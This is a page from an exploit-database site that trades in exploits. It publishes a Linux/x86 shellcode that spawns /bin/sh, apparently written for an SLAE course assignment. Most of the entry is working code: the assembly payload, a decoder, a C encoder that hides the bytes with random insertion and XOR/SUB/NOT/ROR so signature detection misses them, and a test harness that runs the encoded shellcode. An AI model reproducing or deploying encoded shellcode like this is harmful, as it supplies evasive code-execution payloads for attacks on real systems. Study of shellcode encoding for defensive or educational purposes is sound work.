[ home ]  [ private ]  [ 0Day ]  [ discount ]  [ Get Gold ]  [ platforms ]  [ pentest ]  [ search ]  [ faq ]  [ contact ]  [ style ]  [ Prices in Gold ]   db: 39 583    
0day Today Exploit DB Official Facebook
0day Today Exploit DB Official Twitter
0day Today Exploit DB Official RSS Channel
Tor
We DO NOT use Telegram or any messengers / social networks!
We DO NOT use Telegram or any messengers / social networks!

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

 
0day.today - Biggest Exploit Database in the World.
Select your language:  
English
English
Русский
Русский
Deutsch
Deutsch
Türkçe
Türkçe
Français
Français
Italiano
Italiano
Español
Español
Romania
Romania
Polskie
Polskie
العربية
العربية
Japan
Japan
China
China
Things you should know about 0day.today:
  • We use one main domain: http://0day.today
  • Most of the materials is completely FREE
  • If you want to purchase the exploit / get V.I.P. access or pay for any other service,
    you need to buy or earn GOLD
We accept currencies: [contact admin to find more]
           
We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks! We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
I am registered user of 0day.today. I don't want to see this screen in future.
What to do first?
  1. Read the [ agreement ]
  2. Read the [ Submit ] rules
  3. Visit the [ faq ] page
  4. [ Register ] profile
  5. Get [ GOLD ]
  6. If you want to [ sell ]
  7. If you want to [ buy ]
  8. If you lost [ Account ]
  9. Any questions [ admin@0day.today ]


Main links


You can contact us by

Mail:
mr.inj3ct0r@gmail.com
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
Mail:
mr.inj3ct0r@gmail.com
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
0day Today Exploits Market and 0day Exploits Database

Linux/x86 Encoder / Decoder Shellcode (117 bytes)

Author
Xenofon Vassilakopoulos
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-33694
Category
shellcode
Date add
27-12-2019
Platform
linux/x86
# Title     : Linux/x86 - Encoder - Random Bytes + XOR/SUB/NOT/ROR  / Decoder - ROL/NOT/ADD/XOR execve(/bin/sh) Shellcode (117 bytes)
# Author    : Xenofon Vassilakopoulos 
# Date      : July, 2019
# Tested on    : Linux kali 5.3.0-kali2-686-pae #1 SMP Debian 5.3.9-3kali1 (2019-11-20) i686 GNU/Linux
# Architecture    : i686 GNU/Linux
# Shellcode Length  : 117 bytes
# SLAE-ID     : SLAE - 1314 


---------------------- execve-stack /bin/sh --------------------------------

global _start
section .text
_start:
        xor eax, eax
        push eax
        push 0x68732f2f
        push 0x6e69622f
        mov ebx, esp
        push eax
        mov edx, esp
        push ebx
        mov ecx, esp
        mov al, 11
        int 0x80

----------------------- Original Shellcode ---------------------------------


"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

    
----------- Decoder ROL/NOT/ADD/XOR + Removing inserted random bytes -------


global _start

section .text

_start:
        jmp short call_shellcode
decoder:
        pop esi                 
        push esi                
        xor ebx, ebx            
        xor ecx, ecx            
        xor edx, edx            
        mov dl, len        
rotate:
        ;; apply the decoding scheme
        rol byte [esi], 4       
        not byte [esi]         
        add byte [esi], 2       
        xor byte [esi], 0x2c    
        inc esi               
        cmp cl, dl           
        je  init               
        inc cl              
        jmp short rotate

init:
        pop esi               
        lea edi, [esi +1]      
        xor eax, eax           
        mov al, 1             
        xor ecx, ecx         
  
decode:       
        cmp cl, dl                      
        je EncodedShellcode          
        mov bl, byte [esi + eax + 1]   
        mov byte [edi], bl              
        inc edi                         
        inc cl                          
        add al, 2                       
        jmp short decode       
         
call_shellcode:
        call decoder
        EncodedShellcode: db 0x4e,0xc1,0x51,0x2f,0x58,0x3c,0xdb,0xac,0xef,0x82,0xef,0x1c,0x2a,0xd9,0xdb,0x90,0xdb,0x6b,0xef,0x61,0x3b,0x1c,0xcb,0x24,0xfb,0xd6,0xc5,0x50,0x23,0xfa,0x58,0x9c,0xc5,0xb1,0x33,0x97,0x28,0x31,0xc5,0xaa,0x43,0xf9,0x56,0xf4,0xad,0xc2,0x02,0x16,0x55,0xe3
        len equ $-EncodedShellcode


---------  Encoder - Random Bytes Insertion + XOR/SUB/NOT/ROR  ---------------

xenofon@slae:~/Documents/Assignment4$ gcc -o encoder encoder.c
xenofon@slae:~/Documents/Assignment4$ ./encoder


Shellcode:

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80

Shellcode Length 25


Decoded Shellcode:

0x31,0xc0,0x50,0x68,0x2f,0x2f,0x73,0x68,0x68,0x2f,0x62,0x69,0x6e,0x89,0xe3,0x50,0x89,0xe2,0x53,0x89,0xe1,0xb0,0x0b,0xcd,0x80,

Encoded shellcode

0x4e,0x70,0x51,0x61,0x58,0xf4,0xdb,0xe1,0xef,0xef,0xef,0x6a,0x2a,0x41,0xdb,0x4c,0xdb,0x20,0xef,0xbf,0x3b,0x78,0xcb,0x77,0xfb,0x57,0xc5,0x90,0x23,0x62,0x58,0xf0,0xc5,0xe1,0x33,0xe5,0x28,0x9d,0xc5,0x3d,0x43,0xf6,0x56,0x29,0xad,0x29,0x02,0x57,0x55,0x34,

Encoded Shellcode Length 50


xenofon@slae:~/Documents/Assignment4$ cat encoder.c

#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>

#define DEC 0x2 // the value that will be used to substract every byte
#define XORVAL 0x2c // the value that will be used to xor with every byte

// execve stack shellcode /bin/sh
unsigned char shellcode[] = \
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";

void main()
{
        int rot = 4; //right rotation 4 bits
        printf("\n\nShellcode:\n\n");
        int o;
        for (o=0; o<strlen(shellcode); o++) {
                printf("\\x%02x", shellcode[o]);
        }
        printf("\n\nShellcode Length %d\n",sizeof(shellcode)-1);
        printf("\n\nDecoded Shellcode:\n\n");
        o=0;
        for (o; o<strlen(shellcode); o++) {
                printf("0x%02x,", shellcode[o]);
        }
        printf("\n");
        int i;
        unsigned char *buffer = (char*)malloc(sizeof(shellcode)*2);
        srand((unsigned int)time(NULL));
        unsigned char *shellcode2=(char*)malloc(sizeof(shellcode)*2);
        // placeholder to copy the random bytes using rand
        unsigned char shellcode3[] = "\xbb";
        int l = 0;
        int k = 0;
        int j;
        // random byte insertion into even location
        for (i=0; i<(strlen(shellcode)*2); i++) {
                // generate random bytes
                buffer[i] = rand() & 0xff;
                memcpy(&shellcode3[0],(unsigned char*)&buffer[i],sizeof(buffer[i]));
                k = i % 2;
                if (k == 0)
                {
                        shellcode2[i] = shellcode[l];
                        l++;
                }
                else
                {
                        shellcode2[i] = shellcode3[0];
                }
        }
        // apply the encoding scheme
        for (i=0; i<strlen(shellcode2); i++) {
        // XOR every byte with 0x2c
                shellcode2[i] = shellcode2[i] ^ XORVAL;
                // subtract every byte by 2
                shellcode2[i] = shellcode2[i] - DEC;
                // one's complement negation
                shellcode2[i] = ~shellcode2[i];
                // perform the ROR method 
                shellcode2[i] = (shellcode2[i] << rot) | (shellcode2[i] >> sizeof(shellcode2[i])*(8-rot));
        }
        // print encoded shellcode
        printf("\nEncoded shellcode\n\n");
        i=0;
        for (i; i<strlen(shellcode2); i++) {
                printf("0x%02x,", shellcode2[i]);
        }
        printf("\n\nEncoded Shellcode Length %d\n",strlen(shellcode2));
        free(shellcode2);
        free(buffer);
        printf("\n\n");
 }


-----------------------------------  Shellcode -------------------------------------

xenofon@slae:~/Documents/Assignment4$ gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
xenofon@slae:~/Documents/Assignment4$ ./shellcode
Shellcode Length:  117
$ whoami
xenofon


xenofon@slae:~/Documents/Assignment4$ cat shellcode.c
#include <stdio.h>
#include <string.h>

unsigned char code[] = \

        "\xeb\x3c\x5e\x56\x31\xdb\x31\xc9\x31\xd2\xb2\x32\xc0\x06"
        "\x04\xf6\x16\x80\x06\x02\x80\x36\x2c\x46\x38\xd1\x74\x04"
        "\xfe\xc1\xeb\xec\x5e\x8d\x7e\x01\x31\xc0\xb0\x01\x31\xc9"
        "\x8a\x1c\x06\x38\xd1\x74\x12\x8a\x5c\x06\x01\x88\x1f\x47"
        "\xfe\xc1\x04\x02\xeb\xec\xe8\xbf\xff\xff\xff\x4e\xd1\x51"
        "\xb4\x58\x37\xdb\x55\xef\x3d\xef\xbd\x2a\x59\xdb\x81\xdb"
        "\x56\xef\xae\x3b\x1a\xcb\xfa\xfb\x43\xc5\x49\x23\x12\x58"
        "\xd2\xc5\xee\x33\x82\x28\x49\xc5\xc3\x43\x30\x56\xcb\xad"
        "\xe1\x02\x8b\x55\x84";

int main()
{
        printf("Shellcode Length:  %d\n", strlen(code));
        int (*ret)() = (int(*)())code;
        ret();
}

#  0day.today [2024-11-16]  #
0day Today Exploit Database buy and sell exploits type (local, remote, DoS, PoC, etc.)
Send all submissions to mr.inj3ct0r[at]gmail.com
Copyright © 2008-2024 0day Today Team